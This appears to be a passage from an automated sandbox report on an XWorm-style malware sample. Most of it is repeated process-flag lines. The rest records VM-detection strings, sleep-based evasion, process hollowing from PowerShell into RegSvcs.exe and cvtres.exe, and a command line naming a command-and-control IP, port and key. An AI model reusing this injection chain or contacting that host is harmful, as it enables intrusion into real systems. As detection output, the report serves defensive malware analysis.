Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5828, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Memory allocated: 11B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Memory allocated: 2C50000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Memory allocated: 2B80000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5360 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2089 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 4186 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 5661 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1102 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 484 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 5716 Thread sleep time: -570000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 5716 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3412 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104 Thread sleep count: 1102 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732 Thread sleep count: 484 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5496 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3052 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000B.00000003.2061424879.0000000006E51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: svchost.exe, 00000009.00000002.2948964714.0000028AFD82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2951401320.0000028AFEE54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RegSvcs.exe, 00000002.00000002.2247653196.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2160042918.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A50008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40C000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40E000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: B79008 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 176.113.115.228 4412 P0WER 4C7A640DCC0EFBFFD7AE Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat"" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-^q
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q`
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
